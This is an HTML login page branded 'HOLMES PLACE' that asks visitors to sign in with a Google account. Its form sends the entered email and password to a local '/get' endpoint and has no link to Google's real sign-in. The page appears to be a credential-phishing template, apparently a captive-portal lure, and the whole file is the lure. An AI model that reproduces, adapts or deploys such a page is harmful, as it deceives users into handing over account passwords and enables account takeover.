<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.brand-name {
  font-size: 35px;
  color: #222223;
  margin-left: 10px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #222223;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #222223;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #222223;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<?xml version="1.0" encoding="UTF-8"?>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="70.000000pt" height="70.000000pt" viewBox="0 0 512.000000 512.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,512.000000) scale(0.100000,-0.100000)"
fill="#222223" stroke="none">
<path d="M0 2560 l0 -2560 2560 0 2560 0 0 2560 0 2560 -2560 0 -2560 0 0
-2560z m2812 1984 c892 -115 1588 -802 1723 -1699 22 -142 22 -412 1 -557
-111 -766 -633 -1387 -1366 -1627 -345 -112 -745 -125 -1102 -35 -910 229
-1536 1061 -1505 1999 8 255 47 446 137 675 267 678 904 1165 1630 1249 126
14 350 12 482 -5z"/>
<path d="M2435 4399 c-335 -21 -630 -124 -925 -322 -156 -105 -370 -323 -479
-486 -232 -349 -334 -725 -310 -1147 37 -657 444 -1258 1047 -1545 102 -49
310 -121 336 -117 15 2 45 65 141 298 67 162 226 546 354 853 127 307 231 563
231 568 0 5 -123 9 -299 9 l-298 0 -118 -282 c-131 -315 -171 -391 -249 -475
-167 -180 -433 -215 -610 -80 -213 161 -254 468 -95 706 65 98 144 158 265
203 54 20 83 22 353 27 l294 6 122 295 c455 1096 605 1460 605 1469 0 18 -210
29 -365 20z"/>
<path d="M2938 4213 c-31 -76 -190 -460 -354 -853 -163 -393 -299 -723 -301
-733 -5 -16 12 -17 296 -15 l302 3 117 280 c140 335 175 399 261 486 108 109
223 154 370 147 181 -8 321 -117 389 -301 82 -220 -12 -500 -212 -629 -114
-74 -154 -81 -479 -87 l-288 -6 -365 -879 c-256 -617 -361 -882 -353 -887 25
-15 247 -22 381 -11 569 46 1070 342 1393 823 68 101 163 291 204 410 71 206
108 463 98 679 -33 686 -426 1282 -1042 1580 -110 54 -255 108 -330 124 l-31
7 -56 -138z"/>
<path d="M3532 3355 c-87 -27 -170 -113 -237 -245 -37 -73 -205 -477 -205
-492 0 -6 104 -8 288 -6 266 3 291 5 341 25 148 60 236 183 248 348 12 154
-73 308 -201 366 -49 22 -169 24 -234 4z"/>
<path d="M1437 2499 c-147 -35 -258 -160 -289 -328 -28 -149 54 -323 184 -393
36 -19 58 -23 138 -23 83 0 101 3 145 27 28 14 69 46 93 69 76 76 106 137 273
542 l48 117 -277 -1 c-152 -1 -294 -5 -315 -10z"/>
</g>
</svg>





    <div class="brand-name">HOLMES PLACE</div>
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
 account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
